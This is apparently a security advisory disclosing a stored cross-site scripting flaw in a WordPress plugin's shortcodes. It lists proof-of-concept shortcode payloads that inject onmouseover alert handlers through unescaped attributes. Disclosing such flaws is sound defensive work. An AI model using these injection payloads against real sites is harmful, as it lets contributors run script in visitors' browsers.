The plugin does not validate and escape numerous of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[nd_options_team nd_options_class='"onmouseover="alert(/XSS/)//']
[nd_options_team nd_options_color='"onmouseover="alert(/XSS/)//']
[nd_options_testimonial nd_options_class='" onmouseover="alert(/XSS/)" style="background:red;width:100px;height:100px;"']
[nd_options_testimonial nd_options_color='"onmouseover="alert(/XSS/)//']
PS:
- Numerous other shortcodes were affected
- The WPBakery Page Builder plugin is required to initialize the shortcodes.